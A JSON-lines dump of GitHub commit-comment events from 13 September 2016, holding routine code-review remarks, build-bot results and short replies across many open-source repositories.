{"id":"4557459297","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":19006565,"position":13,"line":29,"path":"band-service/src/main/java/hu/schonherz/training/band/impl/BandServiceImpl.java","commit_id":"5e897187b60a4bee64b5d5e497ee7dd5544d7ad5","created_at":"2016-09-13T18:37:32Z","updated_at":"2016-09-13T18:37:32Z","body":"You never use this logger. Why do you have it?"}},"created_at":"2016-09-13T18:37:32Z"}
{"id":"4557460858","type":"CommitCommentEvent","actor":{"login":"TecSeguridad"},"repo":{"name":"vitalidze/traccar-web"},"payload":{"comment":{"id":19006573,"position":null,"line":null,"path":null,"commit_id":"7a5196abd5c29fa3f4ad761a58c2c4e7d625507f","created_at":"2016-09-13T18:37:49Z","updated_at":"2016-09-13T18:37:49Z","body":"Please can you clear something for me? can i fix the #822 issue in your last release?. Because i clone your git then i decompile and edit mapview.java, compile again and i see is traccar 2.11. \r\n\r\nTo be clar, can i edit your traccar-web.war to fix this issue?\r\n\r\nSorry my insitency. I can´t make it works. Thank you\r\n"}},"created_at":"2016-09-13T18:37:49Z"}
{"id":"4557461580","type":"CommitCommentEvent","actor":{"login":"bohrj1"},"repo":{"name":"CentralCollege/forever-dutch"},"payload":{"comment":{"id":19006574,"position":null,"line":null,"path":null,"commit_id":"60d6bcbc76cf73391b8541c2444f41200772369c","created_at":"2016-09-13T18:37:57Z","updated_at":"2016-09-13T18:37:57Z","body":" Right thumbnail was set to class youTubeThumb1, likely from when Larry requested changes while Jacob was gone. Changed to youTubeThumb, which already had correct styles."}},"created_at":"2016-09-13T18:37:57Z"}
{"id":"4557462517","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":19006575,"position":19,"line":29,"path":"band-web/src/main/java/hu/schonherz/training/band/managedbeans/request/CreateBandMB.java","commit_id":"5e897187b60a4bee64b5d5e497ee7dd5544d7ad5","created_at":"2016-09-13T18:38:09Z","updated_at":"2016-09-13T18:38:09Z","body":"You never use this logger. Why do you have it?"}},"created_at":"2016-09-13T18:38:09Z"}
{"id":"4557464136","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":19006579,"position":33,"line":33,"path":"band-web/src/main/java/hu/schonherz/training/band/managedbeans/request/CreateBandMateMB.java","commit_id":"5e897187b60a4bee64b5d5e497ee7dd5544d7ad5","created_at":"2016-09-13T18:38:24Z","updated_at":"2016-09-13T18:38:24Z","body":"You never use this logger. Why do you have it?"}},"created_at":"2016-09-13T18:38:24Z"}
{"id":"4557472451","type":"CommitCommentEvent","actor":{"login":"remitamine"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19006596,"position":33,"line":131,"path":"youtube_dl/extractor/adobepass.py","commit_id":"7e60ce9cf7b104c15fcc4c495166dc57b950b987","created_at":"2016-09-13T18:39:52Z","updated_at":"2016-09-13T18:39:52Z","body":"> Will this trigger when remote side revokes some token for some reason? Does it trigger when you change authn and/or authz in local cache (for test)?\r\n\r\nyes in both cases, it can happen also because of changes in the headers(`ap_42`, `ap_11`, `ap_z`)."}},"created_at":"2016-09-13T18:39:52Z"}
{"id":"4557475932","type":"CommitCommentEvent","actor":{"login":"321zeno"},"repo":{"name":"uofa/gulp-starter"},"payload":{"comment":{"id":19006606,"position":null,"line":null,"path":null,"commit_id":"fcab5e67df85c428f7923c8d6da353ca7e16967c","created_at":"2016-09-13T18:40:28Z","updated_at":"2016-09-13T18:40:28Z","body":"👍 \r\n"}},"created_at":"2016-09-13T18:40:28Z"}
{"id":"4557481504","type":"CommitCommentEvent","actor":{"login":"obadz"},"repo":{"name":"obadz/nixpkgs"},"payload":{"comment":{"id":19006617,"position":18,"line":365,"path":"nixos/modules/system/boot/loader/grub/grub.nix","commit_id":"45e219d03f80a0050b0a2b645a7ab72285d0cb7e","created_at":"2016-09-13T18:41:18Z","updated_at":"2016-09-13T18:41:18Z","body":"yes that's why it's not a PR yet :)"}},"created_at":"2016-09-13T18:41:18Z"}
{"id":"4557484648","type":"CommitCommentEvent","actor":{"login":"cbrevik"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19006627,"position":null,"line":null,"path":null,"commit_id":"fbd2e139103e3d520f6dfc009d6200f8b8168e35","created_at":"2016-09-13T18:41:47Z","updated_at":"2016-09-13T18:41:47Z","body":"@marcshilling Would you have to remove the `@Override` on the old signature as well then? If not then it will probably throw a compiler exception at 33 and above?"}},"created_at":"2016-09-13T18:41:47Z"}
{"id":"4557484908","type":"CommitCommentEvent","actor":{"login":"ericstj"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":19006629,"position":226,"line":2156,"path":"pkg/Microsoft.Private.PackageBaseline/packageIndex.json","commit_id":"ed8347041878054db7707d54201779ccba967782","created_at":"2016-09-13T18:41:50Z","updated_at":"2016-09-13T18:41:50Z","body":"Looks like I might have a bug in index generation for this guy, either that or it doesn't have any assemblies in it, similar for Private packages below."}},"created_at":"2016-09-13T18:41:50Z"}
{"id":"4557488071","type":"CommitCommentEvent","actor":{"login":"saantiaguilera"},"repo":{"name":"saantiaguilera/fiuba-orga-pc-julia-set"},"payload":{"comment":{"id":19006666,"position":7,"line":27,"path":"src/decoder.c","commit_id":"c84392d8f7af7c95b597a3cd3c7ef219df0cff19","created_at":"2016-09-13T18:42:22Z","updated_at":"2016-09-13T18:42:22Z","body":"💯 "}},"created_at":"2016-09-13T18:42:22Z"}
{"id":"4557488931","type":"CommitCommentEvent","actor":{"login":"vitalidze"},"repo":{"name":"vitalidze/traccar-web"},"payload":{"comment":{"id":19006668,"position":null,"line":null,"path":null,"commit_id":"7a5196abd5c29fa3f4ad761a58c2c4e7d625507f","created_at":"2016-09-13T18:42:30Z","updated_at":"2016-09-13T18:42:30Z","body":"This sounds like you are on the wrong branch. I think you are using `master` branch. You should use `dev` instead."}},"created_at":"2016-09-13T18:42:30Z"}
{"id":"4557490638","type":"CommitCommentEvent","actor":{"login":"chandlerroth"},"repo":{"name":"samaritanministries/dash-banner.js"},"payload":{"comment":{"id":19006671,"position":7,"line":93,"path":"README.md","commit_id":"eb90431d8cd7d247a7618c2f9cdb59e376b65e9f","created_at":"2016-09-13T18:42:47Z","updated_at":"2016-09-13T18:42:47Z","body":"Why don't we have grunt installed here?"}},"created_at":"2016-09-13T18:42:47Z"}
{"id":"4557492247","type":"CommitCommentEvent","actor":{"login":"ericstj"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":19006676,"position":4,"line":63,"path":"src/System.IO.Compression/src/System.IO.Compression.csproj","commit_id":"ed8347041878054db7707d54201779ccba967782","created_at":"2016-09-13T18:43:03Z","updated_at":"2016-09-13T18:43:03Z","body":"That seems pretty fragile.  Can you use TargetGroup instead?"}},"created_at":"2016-09-13T18:43:03Z"}
{"id":"4557492465","type":"CommitCommentEvent","actor":{"login":"SurferJeffAtGoogle"},"repo":{"name":"GoogleCloudPlatform/dotnet-docs-samples"},"payload":{"comment":{"id":19006678,"position":132,"line":235,"path":"pubsub/api/PubsubTest.cs","commit_id":"8ec372853c527cdd82eb50886375ef456c34d0c0","created_at":"2016-09-13T18:43:06Z","updated_at":"2016-09-13T18:43:06Z","body":"Good catch: 0 => 1"}},"created_at":"2016-09-13T18:43:06Z"}
{"id":"4557494066","type":"CommitCommentEvent","actor":{"login":"ericstj"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":19006680,"position":5,"line":61,"path":"src/System.IO.Compression/tests/System.IO.Compression.Tests.csproj","commit_id":"ed8347041878054db7707d54201779ccba967782","created_at":"2016-09-13T18:43:20Z","updated_at":"2016-09-13T18:43:20Z","body":"Why the downgrade?"}},"created_at":"2016-09-13T18:43:20Z"}
{"id":"4557495271","type":"CommitCommentEvent","actor":{"login":"romainr"},"repo":{"name":"cloudera/hue"},"payload":{"comment":{"id":19006685,"position":10,"line":118,"path":"apps/filebrowser/src/filebrowser/templates/listdir_components.mako","commit_id":"5465bbd41cce358a27cae4ed370a2efc575d1bf5","created_at":"2016-09-13T18:43:33Z","updated_at":"2016-09-13T18:43:33Z","body":"i18n?"}},"created_at":"2016-09-13T18:43:33Z"}
{"id":"4557498419","type":"CommitCommentEvent","actor":{"login":"ericstj"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":19006697,"position":5,"line":419,"path":"src/System.Private.Xml/src/System.Private.Xml.csproj","commit_id":"ed8347041878054db7707d54201779ccba967782","created_at":"2016-09-13T18:44:06Z","updated_at":"2016-09-13T18:44:06Z","body":"Please add issue number."}},"created_at":"2016-09-13T18:44:06Z"}
{"id":"4557499189","type":"CommitCommentEvent","actor":{"login":"chandlerroth"},"repo":{"name":"samaritanministries/dash-banner.js"},"payload":{"comment":{"id":19006699,"position":27,"line":113,"path":"README.md","commit_id":"eb90431d8cd7d247a7618c2f9cdb59e376b65e9f","created_at":"2016-09-13T18:44:17Z","updated_at":"2016-09-13T18:44:17Z","body":"Why have this `.dash-banner--undefined` class and the normal `.dash-banner` class?"}},"created_at":"2016-09-13T18:44:17Z"}
{"id":"4557500469","type":"CommitCommentEvent","actor":{"login":"allasm"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":19006705,"position":37,"line":117,"path":"components/patient-data/impl/src/main/java/org/phenotips/data/internal/controller/APGARController.java","commit_id":"9e2a07d6b1c7256321135aff498cd7cfe4d28937","created_at":"2016-09-13T18:44:29Z","updated_at":"2016-09-13T18:44:29Z","body":"I woudl keep the individual try-catches in controllers - just the message should be \"error saving THIS KIND OF data\". If catch i not here exception will be propagated and ALL other controllers will no save data as well. Same for all pother controllers"}},"created_at":"2016-09-13T18:44:29Z"}
{"id":"4557502633","type":"CommitCommentEvent","actor":{"login":"ericstj"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":19006712,"position":4,"line":5,"path":"src/System.Private.Xml/src/System/Xml/Schema/XmlSchema.cs","commit_id":"ed8347041878054db7707d54201779ccba967782","created_at":"2016-09-13T18:44:52Z","updated_at":"2016-09-13T18:44:52Z","body":"Is this temporary?"}},"created_at":"2016-09-13T18:44:52Z"}
{"id":"4557504343","type":"CommitCommentEvent","actor":{"login":"dderocher"},"repo":{"name":"dderocher/webdev_misc_frontend_projects"},"payload":{"comment":{"id":19006718,"position":6,"line":6,"path":"README.md","commit_id":"d39099bd4d67b92c168d125c326e60341092e596","created_at":"2016-09-13T18:45:13Z","updated_at":"2016-09-13T18:45:13Z","body":"Testing the merge process"}},"created_at":"2016-09-13T18:45:13Z"}
{"id":"4557508221","type":"CommitCommentEvent","actor":{"login":"allasm"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":19006725,"position":19,"line":62,"path":"components/patient-data/impl/src/main/java/org/phenotips/data/internal/controller/AbstractSimpleController.java","commit_id":"9e2a07d6b1c7256321135aff498cd7cfe4d28937","created_at":"2016-09-13T18:45:51Z","updated_at":"2016-09-13T18:45:51Z","body":"In some controllers you removed this provider, in some you have not - I think there are more places where this can be removed"}},"created_at":"2016-09-13T18:45:51Z"}
{"id":"4557514785","type":"CommitCommentEvent","actor":{"login":"ericstj"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":19006746,"position":26,"line":27,"path":"src/System.Private.Xml/src/System/Xml/Serialization/XmlSerializer.cs","commit_id":"ed8347041878054db7707d54201779ccba967782","created_at":"2016-09-13T18:47:03Z","updated_at":"2016-09-13T18:47:03Z","body":"Why are these public API additions showing up in a merge change?  If they were incorrectly removed I would hope we add them back in a commit with appropriate history.  Same comment for all of these XML source changes."}},"created_at":"2016-09-13T18:47:03Z"}
{"id":"4557514972","type":"CommitCommentEvent","actor":{"login":"vovkkk"},"repo":{"name":"aziz/SublimeFileBrowser"},"payload":{"comment":{"id":19006747,"position":null,"line":null,"path":null,"commit_id":"85539d8dc9e61b85b1baef451d0292d51f616654","created_at":"2016-09-13T18:47:07Z","updated_at":"2016-09-13T18:47:07Z","body":"New version will be released this weekend."}},"created_at":"2016-09-13T18:47:07Z"}
{"id":"4557518549","type":"CommitCommentEvent","actor":{"login":"ericstj"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":19006756,"position":4,"line":6,"path":"src/System.Reflection.Primitives/src/System/Reflection/Emit/Opcode.cs","commit_id":"ed8347041878054db7707d54201779ccba967782","created_at":"2016-09-13T18:47:42Z","updated_at":"2016-09-13T18:47:42Z","body":"Why is this needed?"}},"created_at":"2016-09-13T18:47:42Z"}
{"id":"4557520759","type":"CommitCommentEvent","actor":{"login":"yanex"},"repo":{"name":"yanex/flake"},"payload":{"comment":{"id":19006759,"position":12,"line":null,"path":"example/src/main/java/org/yanex/flaketest/MainActivity.kt","commit_id":"b6a5940555728865bb8ea9faa19e9552480bf61c","created_at":"2016-09-13T18:48:09Z","updated_at":"2016-09-13T18:48:09Z","body":"Hello, world!"}},"created_at":"2016-09-13T18:48:09Z"}
{"id":"4557520927","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19006760,"position":null,"line":null,"path":null,"commit_id":"641c3a9f93b4c0c91f930aa8f9eb0f9626298526","created_at":"2016-09-13T18:48:11Z","updated_at":"2016-09-13T18:48:11Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2366 of 2369 tests passed, 0 test warnings)\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: ZSZ big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-641c3a9f93b4c0c91f930aa8f9eb0f9626298526-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-641c3a9f93b4c0c91f930aa8f9eb0f9626298526-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-13T18:48:11Z"}
{"id":"4557522388","type":"CommitCommentEvent","actor":{"login":"iainsmacleod"},"repo":{"name":"iainsmacleod/script.tvguide.fullscreen"},"payload":{"comment":{"id":19006761,"position":null,"line":null,"path":null,"commit_id":"5451ca07d069f25aa2dc4a5330887f8f8bbe3ef7","created_at":"2016-09-13T18:48:23Z","updated_at":"2016-09-13T18:48:23Z","body":"What was the reason for implementing the highlight image again?"}},"created_at":"2016-09-13T18:48:23Z"}
{"id":"4557526808","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":19006771,"position":226,"line":2156,"path":"pkg/Microsoft.Private.PackageBaseline/packageIndex.json","commit_id":"ed8347041878054db7707d54201779ccba967782","created_at":"2016-09-13T18:49:07Z","updated_at":"2016-09-13T18:49:07Z","body":"Ok, I'll add the version mapping manually here"}},"created_at":"2016-09-13T18:49:07Z"}
{"id":"4557526827","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19006772,"position":null,"line":null,"path":null,"commit_id":"641c3a9f93b4c0c91f930aa8f9eb0f9626298526","created_at":"2016-09-13T18:49:08Z","updated_at":"2016-09-13T18:49:08Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-641c3a9f93b4c0c91f930aa8f9eb0f9626298526-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-13T18:49:08Z"}
{"id":"4557530248","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":19006782,"position":4,"line":63,"path":"src/System.IO.Compression/src/System.IO.Compression.csproj","commit_id":"ed8347041878054db7707d54201779ccba967782","created_at":"2016-09-13T18:49:38Z","updated_at":"2016-09-13T18:49:38Z","body":"Will do."}},"created_at":"2016-09-13T18:49:38Z"}
{"id":"4557534180","type":"CommitCommentEvent","actor":{"login":"Pinkii-"},"repo":{"name":"lbguilherme/linter-clang"},"payload":{"comment":{"id":19006796,"position":45,"line":130,"path":"lib/main.js","commit_id":"bb5c8286ed016e574db2a31485ce4b627fc8a83d","created_at":"2016-09-13T18:50:19Z","updated_at":"2016-09-13T18:50:19Z","body":"What I have done to fix it is: \r\n\r\n``` js\r\noutput = output.replace(/^.*#pragma once.*$/mg,'');\r\n```"}},"created_at":"2016-09-13T18:50:19Z"}
{"id":"4557534472","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19006799,"position":null,"line":null,"path":null,"commit_id":"010ffdef5e405048eb20a38604cf5ecbd7f8ad54","created_at":"2016-09-13T18:50:22Z","updated_at":"2016-09-13T18:50:22Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-010ffdef5e405048eb20a38604cf5ecbd7f8ad54-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-010ffdef5e405048eb20a38604cf5ecbd7f8ad54-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-13T18:50:22Z"}
{"id":"4557536623","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":19006805,"position":null,"line":null,"path":null,"commit_id":"6611430095fc82b427b1d42208d928036c9c5c44","created_at":"2016-09-13T18:50:44Z","updated_at":"2016-09-13T18:50:44Z","body":"Good luck for LTC too!\r\nI hope your scheme does better."}},"created_at":"2016-09-13T18:50:44Z"}
{"id":"4557537018","type":"CommitCommentEvent","actor":{"login":"allasm"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":19006808,"position":160,"line":281,"path":"components/pedigree/ui/src/main/resources/PhenoTips/UIX_Field__pedigree.xml","commit_id":"6f90c0d78a4d617f1f2d630c31d7ce070d4e18fa","created_at":"2016-09-13T18:50:47Z","updated_at":"2016-09-13T18:50:47Z","body":"it is best to use if (response && response.responseJSON)\r\n\r\nBoth can be undefined under different circumstances, and if response is not defined response.responseJSON check will throe an exception and abort code execution"}},"created_at":"2016-09-13T18:50:47Z"}
{"id":"4557537538","type":"CommitCommentEvent","actor":{"login":"jrevels"},"repo":{"name":"JuliaGPU/julia"},"payload":{"comment":{"id":19006812,"position":null,"line":null,"path":null,"commit_id":"2ee239c3058eb8f1870925e38554952ab732757c","created_at":"2016-09-13T18:50:53Z","updated_at":"2016-09-13T18:50:53Z","body":"By design, Nanosoldier blocks non-`JuliaLang/julia` job submissions. Maybe we should make allow submissions from forks, though, if the user is a Julia committer...related issue: JuliaCI/Nanosoldier.jl#18"}},"created_at":"2016-09-13T18:50:53Z"}
{"id":"4557540566","type":"CommitCommentEvent","actor":{"login":"yanex"},"repo":{"name":"yanex/flake"},"payload":{"comment":{"id":19006819,"position":null,"line":12,"path":"example/src/main/java/org/yanex/flaketest/MainActivity.kt","commit_id":"b6a5940555728865bb8ea9faa19e9552480bf61c","created_at":"2016-09-13T18:51:23Z","updated_at":"2016-09-13T18:51:23Z","body":"Hello, world!"}},"created_at":"2016-09-13T18:51:23Z"}
{"id":"4557541312","type":"CommitCommentEvent","actor":{"login":"zacalim16"},"repo":{"name":"Evisceration/DeviceControl"},"payload":{"comment":{"id":19006822,"position":8,"line":76,"path":"devicecontrol-next/src/main/AndroidManifest.xml","commit_id":"f7118224290aea335eca3e9ae87fa539b5a52869","created_at":"2016-09-13T18:51:30Z","updated_at":"2016-09-13T18:51:30Z","body":"Leave a line note"}},"created_at":"2016-09-13T18:51:30Z"}
{"id":"4557544203","type":"CommitCommentEvent","actor":{"login":"yanex"},"repo":{"name":"yanex/flake"},"payload":{"comment":{"id":19006828,"position":null,"line":20,"path":"example/src/main/java/org/yanex/flaketest/MainActivity.kt","commit_id":"b6a5940555728865bb8ea9faa19e9552480bf61c","created_at":"2016-09-13T18:51:57Z","updated_at":"2016-09-13T18:51:57Z","body":"Hello, world!"}},"created_at":"2016-09-13T18:51:57Z"}
{"id":"4557551037","type":"CommitCommentEvent","actor":{"login":"allasm"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":19006853,"position":null,"line":null,"path":null,"commit_id":"9e2a07d6b1c7256321135aff498cd7cfe4d28937","created_at":"2016-09-13T18:53:13Z","updated_at":"2016-09-13T18:53:13Z","body":"You also forgot to build without `-Pquick`, and to modify mainpom.xml accordingly to reflect interface change - `[ERROR] 7004: org.phenotips.data.PatientDataController: In method 'public void save(org.phenotips.data.Patient)' the number of arguments has changed`"}},"created_at":"2016-09-13T18:53:13Z"}
{"id":"4557556113","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":19006871,"position":5,"line":61,"path":"src/System.IO.Compression/tests/System.IO.Compression.Tests.csproj","commit_id":"ed8347041878054db7707d54201779ccba967782","created_at":"2016-09-13T18:54:04Z","updated_at":"2016-09-13T18:54:04Z","body":"A bunch of System.IO.Compression tests in dev/api depend on the 1.0.3 version which is how it was in dev/api. When merging, I took master's 1.0.4 version but suddenly all these tests started to fail because they were missing TestData contents. Downgrading it back to 1.0.3 seems to fix the test failures."}},"created_at":"2016-09-13T18:54:04Z"}
{"id":"4557558591","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":19006884,"position":5,"line":419,"path":"src/System.Private.Xml/src/System.Private.Xml.csproj","commit_id":"ed8347041878054db7707d54201779ccba967782","created_at":"2016-09-13T18:54:28Z","updated_at":"2016-09-13T18:54:28Z","body":"Yes, I was waiting for PR go get published to add it"}},"created_at":"2016-09-13T18:54:28Z"}
{"id":"4557562372","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":19006889,"position":4,"line":5,"path":"src/System.Private.Xml/src/System/Xml/Schema/XmlSchema.cs","commit_id":"ed8347041878054db7707d54201779ccba967782","created_at":"2016-09-13T18:55:10Z","updated_at":"2016-09-13T18:55:10Z","body":"no, This was added in dev/api but got removed in the merge commit. This is adding it back."}},"created_at":"2016-09-13T18:55:10Z"}
{"id":"4557563313","type":"CommitCommentEvent","actor":{"login":"gau-veldt"},"repo":{"name":"gau-veldt/OmegaRising"},"payload":{"comment":{"id":19006895,"position":null,"line":null,"path":null,"commit_id":"5dd04cc86cf9eba049880547458e6e54a81082be","created_at":"2016-09-13T18:55:20Z","updated_at":"2016-09-13T18:55:20Z","body":"Mate gets terrible screenshots when things are moving :(\r\n![screenshot](https://cloud.githubusercontent.com/assets/1862162/18487106/cebf9fe0-79a8-11e6-9348-8399f19cacd9.png)\r\n"}},"created_at":"2016-09-13T18:55:20Z"}
{"id":"4557565356","type":"CommitCommentEvent","actor":{"login":"cchantep"},"repo":{"name":"playframework/playframework"},"payload":{"comment":{"id":19006901,"position":17,"line":0,"path":"framework/src/play-netty-server/src/main/scala/play/core/server/netty/NettyModelConversion.scala","commit_id":"a04eb013f3055e4bee2fc81869a1e271ce5d20e8","created_at":"2016-09-13T18:55:39Z","updated_at":"2016-09-13T18:55:39Z","body":"I not found of using `.head` which is unsafe anyway"}},"created_at":"2016-09-13T18:55:39Z"}
{"id":"4557577026","type":"CommitCommentEvent","actor":{"login":"ishantvivek"},"repo":{"name":"ghsr/proprietary_vendor_samsung_galaxys2plus-common"},"payload":{"comment":{"id":19006923,"position":null,"line":null,"path":null,"commit_id":"47e446dfed2ba543602e8e962aa0f9a064cd537d","created_at":"2016-09-13T18:57:40Z","updated_at":"2016-09-13T18:57:40Z","body":"Thanks, i will try and report you next time with logs. "}},"created_at":"2016-09-13T18:57:40Z"}
{"id":"4557580566","type":"CommitCommentEvent","actor":{"login":"remitamine"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19006931,"position":7,"line":356,"path":"youtube_dl/options.py","commit_id":"7a7309219cae70e14f58e904591a77360bfbc985","created_at":"2016-09-13T18:58:14Z","updated_at":"2016-09-13T18:58:14Z","body":"also you have proposed before an option to print supported tv providers, should i make a new option group for adobe pass related options or just keep it in the authentication option group."}},"created_at":"2016-09-13T18:58:14Z"}
{"id":"4557582178","type":"CommitCommentEvent","actor":{"login":"kommen"},"repo":{"name":"ianstormtaylor/slate"},"payload":{"comment":{"id":19006934,"position":null,"line":null,"path":null,"commit_id":"3ef82a3fbcf5a1408e44367440cbbc1cfcf811b7","created_at":"2016-09-13T18:58:29Z","updated_at":"2016-09-13T18:58:29Z","body":"Typo? should probably be `Transform`."}},"created_at":"2016-09-13T18:58:29Z"}
{"id":"4557593468","type":"CommitCommentEvent","actor":{"login":"xdevelnet"},"repo":{"name":"xdevelnet/hslice"},"payload":{"comment":{"id":19006959,"position":null,"line":null,"path":null,"commit_id":"8bf54e61e1e8d12698c5f0675be931feef6b25df","created_at":"2016-09-13T19:00:30Z","updated_at":"2016-09-13T19:00:30Z","body":"![what year is it](http://whatyearisit.info/img/what_year_is_it.jpg)"}},"created_at":"2016-09-13T19:00:30Z"}
{"id":"4557597792","type":"CommitCommentEvent","actor":{"login":"arco"},"repo":{"name":"csendre/android_device_samsung_serranodsdd"},"payload":{"comment":{"id":19006966,"position":22,"line":320,"path":"ril/SerranoDSRIL.java","commit_id":"a8832bcc29aa7c77ae1fb21a873752ba9f26d98b","created_at":"2016-09-13T19:01:18Z","updated_at":"2016-09-13T19:01:18Z","body":"Remove the int, so:\r\n\r\nreturn super.processUnsolicited(p, type);"}},"created_at":"2016-09-13T19:01:18Z"}
{"id":"4557605168","type":"CommitCommentEvent","actor":{"login":"cxd19891121"},"repo":{"name":"cxd19891121/Eims-0913-git"},"payload":{"comment":{"id":19006983,"position":null,"line":null,"path":null,"commit_id":"f3432e92a1e0b366ec6c076c0b5e4defe003384e","created_at":"2016-09-13T19:02:36Z","updated_at":"2016-09-13T19:02:36Z","body":"LGTM"}},"created_at":"2016-09-13T19:02:36Z"}
{"id":"4557607324","type":"CommitCommentEvent","actor":{"login":"jovo"},"repo":{"name":"jovo/cv"},"payload":{"comment":{"id":19006992,"position":null,"line":null,"path":null,"commit_id":"92c885deb1357f20e5ef0ef2c7200d96d8a3b143","created_at":"2016-09-13T19:03:02Z","updated_at":"2016-09-13T19:03:02Z","body":"do other PIs have a \"section\" on \"conferences i've organized\" or something?\n\nOn Tue, Sep 13, 2016 at 2:42 PM, Jesse Leigh Patsolic <\nnotifications@github.com> wrote:\n\n> Add IEEE eScience conference -- @jovo\n>\n> --\n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/jovo/cv/commit/92c885deb1357f20e5ef0ef2c7200d96d8a3b143\n>\n\n\n\n-- \nthe glass is all full:  half water, half air.\nneurodata.io, jovo calendar\n<https://calendar.google.com/calendar/embed?src=joshuav%40gmail.com&ctz=America/New_York>\n"}},"created_at":"2016-09-13T19:03:02Z"}
{"id":"4557610494","type":"CommitCommentEvent","actor":{"login":"saraervik"},"repo":{"name":"robertab/dd1352"},"payload":{"comment":{"id":19007000,"position":null,"line":null,"path":null,"commit_id":"193a4a89cfeb02f2b8fe5d19611a250a2933a101","created_at":"2016-09-13T19:03:38Z","updated_at":"2016-09-13T19:03:38Z","body":"Du verkar ha någon emacs inställning så tabbarna blir mindre om det är flera nivåer? Jag tabbade ut i intelliJ och det gör att det ser ut att vara mer kodändring än vad det är."}},"created_at":"2016-09-13T19:03:38Z"}
{"id":"4557614890","type":"CommitCommentEvent","actor":{"login":"theTwist84"},"repo":{"name":"theTwist84/Twisters-H5-Console-Tool"},"payload":{"comment":{"id":19007017,"position":45,"line":72,"path":"Twisters-H5-Console-Tool/MemoryManager.cs","commit_id":"420d958ebe766fb2b75267a1c22a23bb0f76cd97","created_at":"2016-09-13T19:04:27Z","updated_at":"2016-09-13T19:04:27Z","body":"I'd appreciate it if someone would explain how to do this"}},"created_at":"2016-09-13T19:04:27Z"}
{"id":"4557615399","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":19007021,"position":26,"line":27,"path":"src/System.Private.Xml/src/System/Xml/Serialization/XmlSerializer.cs","commit_id":"ed8347041878054db7707d54201779ccba967782","created_at":"2016-09-13T19:04:31Z","updated_at":"2016-09-13T19:04:31Z","body":"This implementation used to live in System.Xml.XmlSerializer folder, bot got moved in dev/api (originally moved in dev/xml) under System.Private.Xml, and the way it was done basically made git to treat them as completely different files, so all changes done in master were not tracked as part of the merge. After the merge, I went in an manually updated this file to add the changes that were made in the old location of the file."}},"created_at":"2016-09-13T19:04:31Z"}
